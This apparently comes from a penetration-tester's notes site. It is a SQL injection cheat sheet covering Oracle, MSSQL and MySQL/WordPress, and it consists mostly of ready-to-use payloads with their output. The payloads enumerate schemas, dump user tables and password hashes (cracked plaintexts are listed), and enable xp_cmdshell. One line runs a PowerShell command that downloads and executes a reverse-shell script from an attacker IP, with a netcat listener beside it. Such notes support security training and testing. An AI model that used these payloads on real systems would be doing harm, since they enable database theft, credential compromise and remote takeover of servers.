SQL Injections & Enum

find db > table name > table columns > user > pass

Common flow (oracle as eg.)

Check for error messages if any hints on facilitating injection syntax

a' or '1'='1

For a search field attack, enum the number of returning columns (eg oracle db)

a' or 'a'='a' order by 4--'
# error

a' or 'a'='a' order by 2--'
# no error

a' or 'a'='a' order by 3--'
# maximum error-free = returning number of columns

Enum data type

a' or 'a'='a' union all select 1,2,3 from dual--'
# wrong data type

a' or 'a'='a' union all select 'A','B',3 from dual--'
# correct data type could return results

Check current db user: a' or 'a'='a' union all select user,null,3 from dual--'

List all tables: a' or 'a'='a' union all select table_name,owner,3 from all_tables--' and find table_name of specific dbuser owner

Enum column names: a' or 'a'='a' union all select column_name,table_name,3 from all_tab_columns--' and find column_name of specific table_name

List interested contents: a' or 'a'='a' union all select ADMIN_NAME,PASSWORD,3 from WEB_ADMINS--'

MSSQL

a' or 'a'='a' union all select 'a',2 --'

a' or 'a'='a' union all select user,2 --

a' union all select @@version,2 --
Microsoft SQL Server 2012 - 11.0.2100.60 (X64) Feb 10 2012 19:39:15 Copyright (c) Microsoft Corporation Express Edition (64-bit) on Windows NT 6.2 (Build 9200: ) (Hypervisor)

a' union all select user,2 --
dbo

a' union all select name,2 from master ..sysdatabases--'
Song name: master - From the year: 2
Song name: tempdb - From the year: 2
Song name: model - From the year: 2
Song name: msdb - From the year: 2
Song name: music - From the year: 2

a' union all select table_name,2 from INFORMATION_SCHEMA.TABLES--'
Song name: albums - From the year: 2
Song name: singles - From the year: 2
Song name: concerts - From the year: 2
Song name: users - From the year: 2
Song name: songs - From the year: 2

a' union all select column_name,2 from information_schema.columns where table_name='users'--'
Song name: id - From the year: 2
Song name: name - From the year: 2
Song name: pass - From the year: 2

a' union all select name,id from users--'
Song name: alice - From the year: 0
Song name: brett - From the year: 1
Song name: peter - From the year: 2
Song name: eric - From the year: 3

a' or 'a'='a' union all select pass,id from users--'
Artist name: 5f4dcc3b5aa765d61d8327deb882cf99 - From the year: 0
Artist name: 34819d7beeabb9260a5c854bc85b3e44 - From the year: 1
Artist name: 7d9264f1c1c042b799ef08da95a782d4 - From the year: 2
Artist name: 123pass123 - From the year: 3

alice:password
brett:mypassword
peter:123pass123
eric:123pass123

a' union all select null,is_srvrolemember('sysadmin')--'
check whether current db user is sysadmin
1

a' UNION all SELECT null,2; EXEC sp_configure 'show advanced options', 1--
a' UNION all SELECT null,2; RECONFIGURE--
a' UNION all SELECT null,2; EXEC sp_configure 'xp_cmdshell', 1--
a' UNION all SELECT null,2; RECONFIGURE--

python -m http.server 80
nc -nlvp 4444

a' UNION all SELECT null,2; EXEC xp_cmdshell 'powershell -c IEX(New-Object Net.WebClient).DownloadString(''http://192.168.119.173/rev.ps1'')'--

or \"\" to escape special char

MySQL / Maria


"1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"

"1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,table_name,11 FROM information_schema.tables#"

"1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,column_name,11 FROM information_schema.columns WHERE table_name='wp_users'#"

"1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_login,11 FROM wp_users#"

"1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_pass,11 FROM wp_users#"

PreviousWordPress NextBruteforce

Last updated 2 years ago